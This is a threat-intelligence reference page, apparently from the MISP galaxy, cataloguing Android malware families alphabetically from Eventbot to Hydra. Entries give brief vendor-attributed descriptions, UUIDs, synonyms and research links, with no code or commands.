Metadata key | Value |
---|---|
type | [] |
Eventbot
According to ThreatFabric, the app overlays 15 financial targets in the UK, Italy and Spain, and sniffs 234 apps belonging to banks located in Europe as well as cryptocurrency wallets.
Internal MISP references
UUID 5a6fb8cd-d582-4c8c-b7e0-a5b4cf4f248f
which can be used as unique global reference for Eventbot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ExoBot
Internal MISP references
UUID c9f2b058-6c22-462a-a20a-fca933a597dd
which can be used as unique global reference for ExoBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot - webarchive
- https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html - webarchive
- https://www.bleepingcomputer.com/news/security/exobot-author-calls-it-quits-and-sells-off-banking-trojan-source-code/ - webarchive
- https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/ - webarchive
- https://blog.cyble.com/2022/03/24/coper-banking-trojan/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-exo-android-trojan-sold-on-hacking-forums-dark-web/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/ - webarchive
- https://www.bleepingcomputer.com/news/security/source-code-for-exobot-android-banking-trojan-leaked-online/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Exodus
Internal MISP references
UUID 462bc006-b7bd-4e10-afdb-52baf86121e8
which can be used as unique global reference for Exodus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv - webarchive
- https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store - webarchive
- https://securitywithoutborders.org/blog/2019/03/29/exodus.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FaceStealer
Facebook Credential Stealer.
Internal MISP references
UUID c35ebd96-d2f8-4add-b86f-f552ed5dfa9b
which can be used as unique global reference for FaceStealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.facestealer - webarchive
- https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html - webarchive
- https://labs.k7computing.com/index.php/facestealer-the-rise-of-facebook-credential-stealer-malware/ - webarchive
- https://threatpost.com/facestealer-trojan-google-play-facebook/179015/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FakeAdBlocker
Internal MISP references
UUID d0ae2b6b-5137-4b64-be3e-4bbc9aa007a6
which can be used as unique global reference for FakeAdBlocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Fakecalls
According to Kaspersky, Fakecalls is a Trojan that masquerades as a banking app and imitates phone conversations with bank employees.
Internal MISP references
UUID 014aeab6-2292-4ee5-83d6-fffb0fc21423
which can be used as unique global reference for Fakecalls
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FakeDefend
Internal MISP references
UUID 8ea1fc8c-ec66-4d39-b32a-da69d3277da4
which can be used as unique global reference for FakeDefend
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FakeSpy
Internal MISP references
UUID dd821edd-901b-4a5e-b35f-35bb811964ab
which can be used as unique global reference for FakeSpy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/ - webarchive
- https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/ - webarchive
- https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681 - webarchive
- https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FakeGram
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FakeGram.
Known Synonyms |
---|
FakeTGram |
Internal MISP references
UUID 6c0fc7e4-4629-494f-b471-f7a8cc47c0e0
which can be used as unique global reference for FakeGram
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FastFire
Internal MISP references
UUID 5613da3a-06f5-4363-b468-0b8a03ffc292
which can be used as unique global reference for FastFire
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FastSpy
Internal MISP references
UUID a5e3e217-3790-4d7c-b67a-906b9ee69034
which can be used as unique global reference for FastSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FileCoder
According to Heimdal, a new strain of ransomware emerged on Android mobile devices. It targets those who are running Android 5.1 and higher. This Android ransomware strain has been dubbed FileCoder (Android/Filecoder.c) by security researchers, and it spreads via text messages containing a malicious link.
Internal MISP references
UUID 09ff3520-b643-44bd-a0de-90c0e75ba12f
which can be used as unique global reference for FileCoder
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FinFisher (Android)
Internal MISP references
UUID 0bf7acd4-6493-4126-9598-d2ed069e32eb
which can be used as unique global reference for FinFisher (Android)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher - webarchive
- https://github.com/linuzifer/FinSpy-Dokumentation - webarchive
- https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/ - webarchive
- https://securelist.com/finspy-unseen-findings/104322/ - webarchive
- https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/ - webarchive
- https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf - webarchive
- https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlexiSpy (Android)
Internal MISP references
UUID 4305d59a-0d07-4021-a902-e7996378898b
which can be used as unique global reference for FlexiSpy (Android)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlexNet
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlexNet.
Known Synonyms |
---|
gugi |
Internal MISP references
UUID 80d7d229-b3a7-4205-8304-f7b18bda129f
which can be used as unique global reference for FlexNet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FluBot
PRODAFT describes FluBot as a banking malware which originally targeted Spain. Since the first quarter of 2021 it has been targeting many other European countries as well as Japan. It uses a DGA for its C&C and relies on both DNS and DNS-over-HTTPS for name resolution. Despite arrests of multiple people suspected of involvement with this malware in March of 2021, the campaign has only intensified since.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FluBot.
Known Synonyms |
---|
Cabassous |
FakeChat |
Internal MISP references
UUID ef91833f-3334-4955-9218-f106494e9fc0
which can be used as unique global reference for FluBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot - webarchive
- https://blog.fox-it.com/2022/06/29/flubot-the-evolution-of-a-notorious-android-banking-malware/ - webarchive
- https://mobile.twitter.com/alberto__segura/status/1400396365759500289 - webarchive
- https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain - webarchive
- https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/ - webarchive
- https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/ - webarchive
- https://securityintelligence.com/posts/story-of-fakechat-malware/ - webarchive
- https://therecord.media/flubot-malware-gang-arrested-in-barcelona/ - webarchive
- https://twitter.com/malwrhunterteam/status/1359939300238983172 - webarchive
- https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html - webarchive
- https://hispasec.com/resources/FedexBanker.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://twitter.com/alberto__segura/status/1395675479194095618 - webarchive
- https://twitter.com/alberto__segura/status/1404098461440659459 - webarchive
- https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/ - webarchive
- https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/ - webarchive
- https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html - webarchive
- https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9 - webarchive
- https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html - webarchive
- https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users - webarchive
- https://www.prodaft.com/m/reports/FluBot_4.pdf - webarchive
- https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones - webarchive
- https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://twitter.com/alberto__segura/status/1399249798063087621?s=20 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.infinitumit.com.tr/flubot-zararlisi/ - webarchive
- https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/ - webarchive
- https://twitter.com/alberto__segura/status/1402615237296148483 - webarchive
- https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368 - webarchive
- https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond - webarchive
- https://blog.zimperium.com/flubot-vs-zimperium/ - webarchive
- https://twitter.com/alberto__segura/status/1384840011892285440 - webarchive
- https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf - webarchive
- https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/ - webarchive
- https://www.ncsc.admin.ch/22w12-de - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06 - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon - webarchive
- https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/ - webarchive
- https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FluHorse
According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.
Internal MISP references
UUID aeaeb8b2-650e-471d-a901-3c4fbae42854
which can be used as unique global reference for FluHorse
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.fluhorse - webarchive
- https://www.fortinet.com/blog/threat-research/fortinet-reverses-flutter-based-android-malware-fluhorse - webarchive
- https://cryptax.medium.com/inside-kangapack-the-kangaroo-packer-with-native-decryption-3e7e054679c4 - webarchive
- https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlyTrap
Zimperium notes that this malware has hit more than 10,000 victims in 140+ countries using social media hijacking, third-party app stores and sideloading.
Internal MISP references
UUID 24af5bcc-d4bd-42dd-aed4-f994b30b4921
which can be used as unique global reference for FlyTrap
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FunkyBot
Internal MISP references
UUID bc0d37fa-113a-45ba-8a1c-b9d818e31f27
which can be used as unique global reference for FunkyBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.funkybot - webarchive
- https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681 - webarchive
- https://securelist.com/roaming-mantis-part-v/96250/ - webarchive
- https://www.fortinet.com/blog/threat-research/funkybot-malware-targets-japan.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FurBall
According to Check Point, they uncovered an operation dubbed "Domestic Kitten", which uses malicious Android applications to steal sensitive personal information from its victims: screenshots, messages, call logs, surrounding voice recordings, and more. This operation managed to remain under the radar for a long time, as the associated files were not attributed to a known malware family and were only detected by a handful of security vendors.
Internal MISP references
UUID 53282cc8-fefc-47d7-b6a5-a82a05a88f2a
which can be used as unique global reference for FurBall
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball - webarchive
- https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html - webarchive
- https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/ - webarchive
- https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/ - webarchive
- https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf - webarchive
- https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program - webarchive
- https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/ - webarchive
- https://www.bleepingcomputer.com/news/security/hacking-group-updates-furball-android-spyware-to-evade-detection/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Geost
Internal MISP references
UUID b9639878-733c-4f30-9a13-4680a7e17415
which can be used as unique global reference for Geost
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost - webarchive
- https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/ - webarchive
- https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ghimob
Internal MISP references
UUID 3d1f2591-05fe-42f4-aaf8-ed1428f17605
which can be used as unique global reference for Ghimob
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GhostCtrl
Internal MISP references
UUID 3b6c1771-6d20-4177-8be0-12116e254bf5
which can be used as unique global reference for GhostCtrl
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gigabud
Gigabud is the name of an Android Remote Access Trojan (RAT) that can record the victim's screen and steal banking credentials by abusing the Accessibility Service. Gigabud masquerades as banking, shopping, and other applications. Threat actors have been observed using deceptive websites to distribute Gigabud RAT.
Internal MISP references
UUID 8f188382-7a31-46a5-83c6-5991dfe739ee
which can be used as unique global reference for Gigabud
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ginp
Ginp is a mobile banking malware targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit card numbers by implementing overlay attacks; overlay targets include, for example, the default SMS application. What makes Ginp a remarkable family is how its operators managed to keep it undetected over time, even while it received version upgrades over many years. According to ThreatFabric, Ginp has the following features:
- Overlaying: Dynamic (local overlays obtained from the C2)
- SMS harvesting: SMS listing
- SMS harvesting: SMS forwarding
- Contact list collection
- Application listing
- Overlaying: Targets list update
- SMS: Sending
- Calls: Call forwarding
- C2 Resilience: Auxiliary C2 list
- Self-protection: Hiding the App icon
- Self-protection: Preventing removal
- Self-protection: Emulation-detection
Internal MISP references
UUID 77e9ace0-f6e5-4d6e-965a-a653ff626be1
which can be used as unique global reference for Ginp
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp - webarchive
- https://twitter.com/ESETresearch/status/1269945115738542080 - webarchive
- https://www.threatfabric.com/blogs/2020_year_of_the_rat.html - webarchive
- https://www.youtube.com/watch?v=WeL_xSryj8E - webarchive
- https://muha2xmad.github.io/malware-analysis/ginp/ - webarchive
- https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/ - webarchive
- https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html - webarchive
- https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GlanceLove
Internal MISP references
UUID 24a709ef-c2e4-45ca-90b6-dfa184472f49
which can be used as unique global reference for GlanceLove
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove - webarchive
- https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773 - webarchive
- https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/ - webarchive
- https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/ - webarchive
- https://www.clearskysec.com/glancelove/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GnatSpy
Internal MISP references
UUID a3b6a355-3afe-49ae-9f87-679c6c382943
which can be used as unique global reference for GnatSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoatRAT
Internal MISP references
UUID f699d295-1072-418b-8aa2-cb36fbd4c6c7
which can be used as unique global reference for GoatRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Godfather
According to PCrisk, Godfather is the name of an Android malware targeting online banking pages and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications. Threat actors use Godfather to steal account credentials. Additionally, Godfather can steal SMSs, device information, and other data.
Internal MISP references
UUID 8e95a9d5-08fb-4f11-b70a-622148bd1e62
which can be used as unique global reference for Godfather
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.godfather - webarchive
- https://github.com/LaurieWired/StrangeLoop - webarchive
- https://blog.group-ib.com/godfather-trojan - webarchive
- https://brandefense.io/blog/godfather-android-banking-trojan/ - webarchive
- https://muha2xmad.github.io/malware-analysis/godfather/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoldenEagle
Internal MISP references
UUID b7c0c11d-8471-4b10-bbf2-f9c0f30bc27e
which can be used as unique global reference for GoldenEagle
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoldenRAT
Internal MISP references
UUID e111fff8-c73c-4069-b804-2d3732653481
which can be used as unique global reference for GoldenRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoldDigger
Internal MISP references
UUID 8ff9cde1-627e-4967-8b12-195544f31d83
which can be used as unique global reference for GoldDigger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
goontact
Internal MISP references
UUID 008ef3f3-579e-4065-ad0a-cf96be00becf
which can be used as unique global reference for goontact
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.goontact - webarchive
- https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail - webarchive
- https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GPlayed
Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed.
Internal MISP references
UUID 13dc1ec7-aba7-4553-b990-8323405a1d32
which can be used as unique global reference for GPlayed
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gravity RAT (Android)
Internal MISP references
UUID fed09d31-6378-4e85-b644-5500491dff88
which can be used as unique global reference for Gravity RAT (Android)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GriftHorse
Internal MISP references
UUID fe40a0b2-be48-41c5-8814-7fa3a6a993b9
which can be used as unique global reference for GriftHorse
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Guerrilla
Internal MISP references
UUID 57de6ac2-8cf0-4022-aee2-5f76e3dbd503
which can be used as unique global reference for Guerrilla
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gustuff
Group-IB describes Gustuff as a mobile Android Trojan whose potential targets include customers of leading international banks, users of cryptocurrency services, and popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities. The analysis of a Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India, and users of 32 cryptocurrency apps.
Internal MISP references
UUID a5e2b65f-2087-465d-bf14-4acf891d5d0f
which can be used as unique global reference for Gustuff
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff - webarchive
- https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html - webarchive
- https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html - webarchive
- https://www.group-ib.com/media/gustuff/ - webarchive
- https://www.threatfabric.com/blogs/2020_year_of_the_rat.html - webarchive
- https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf - webarchive
- https://blog.talosintelligence.com/2019/10/gustuffv2.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HARDRAIN (Android)
Internal MISP references
UUID 0caf0292-b01a-4439-b56f-c75b71900bc0
which can be used as unique global reference for HARDRAIN (Android)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.hardrain - webarchive
- https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf - webarchive
- https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990 - webarchive
- https://unit42.paloaltonetworks.com/unit42-operation-blockbuster-goes-mobile/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HawkShaw
Internal MISP references
UUID 5ae490bd-84ca-434f-ab34-b87bd38e4523
which can be used as unique global reference for HawkShaw
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HenBox
Internal MISP references
UUID 0185f9f6-018e-4eb5-a214-d810cb759a38
which can be used as unique global reference for HenBox
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.henbox - webarchive
- https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/ - webarchive
- https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hermit
Lookout states that Hermit is an advanced spyware designed to target iOS and Android mobile devices. It is designed to collect extensive amounts of sensitive data on its victims such as their location, contacts, private messages, photos, call logs, phone conversations, ambient audio recordings, and more.
Internal MISP references
UUID b95f25a0-ba22-4320-95e3-323fbf852846
which can be used as unique global reference for Hermit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.hermit - webarchive
- https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/ - webarchive
- https://www.lighthousereports.nl/investigation/revealing-europes-nso - webarchive
- https://de.lookout.com/blog/hermit-spyware-discovery - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HeroRAT
Internal MISP references
UUID 537f17ac-74e5-440b-8659-d4fdb4af41a6
which can be used as unique global reference for HeroRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HiddenAd
HiddenAd is a malware that shows ads as overlays on the phone.
Internal MISP references
UUID 171c97ca-6b61-426d-8f72-c099528625e9
which can be used as unique global reference for HiddenAd
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad - webarchive
- https://twitter.com/LukasStefanko/status/1136568939239137280 - webarchive
- https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users - webarchive
- https://securelist.com/mobile-malware-evolution-2019/96280/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-hiddenads-malware-that-runs-automatically-and-hides-on-google-play-1m-users-affected/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HilalRAT
RAT, which can be used to extract sensitive information, e.g. contact lists, text messages, location information.
Internal MISP references
UUID 96bea6aa-3202-4352-8e36-fa05c677c0e8
which can be used as unique global reference for HilalRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hook
According to ThreatFabric, this is a malware family based on apk.ermac. The name Hook is the name self-advertised by its vendor DukeEugene. It provides WebSocket communication and has RAT capabilities.
Internal MISP references
UUID c101bc42-1011-43f6-9d30-629013c318cd
which can be used as unique global reference for Hook
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.hook - webarchive
- https://research.nccgroup.com/2023/09/11/from-ermac-to-hook-investigating-the-technical-differences-between-two-android-malware-variants/ - webarchive
- https://www.sciencedirect.com/science/article/pii/S266628172400088X - webarchive
- https://github.com/0xperator/hookbot_source - webarchive
- https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://medium.com/@joshuapenny88/hostinghunter-series-chang-way-technologies-co-limited-a9ba4fce0f65 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hydra
Avira states that Hydra is an Android BankBot variant, a type of malware designed to steal banking credentials. It does this by asking the user to enable dangerous permissions such as accessibility; every time the banking app is opened, the malware hijacks the user by overwriting the legitimate banking application's login page with a malicious one. The goal is the same: to trick the user into entering their login credentials so that they go straight to the malware authors.
Internal MISP references
UUID ae25953d-cf7c-4304-9ea2-2ea1498ea035
which can be used as unique global reference for Hydra
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra - webarchive
- https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/ - webarchive
- https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/ - webarchive
- https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5 - webarchive
- https://muha2xmad.github.io/malware-analysis/hydra/ - webarchive
- https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html - webarchive
- https://www.threatfabric.com/blogs/2020_year_of_the_rat.html - webarchive
- https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221 - webarchive
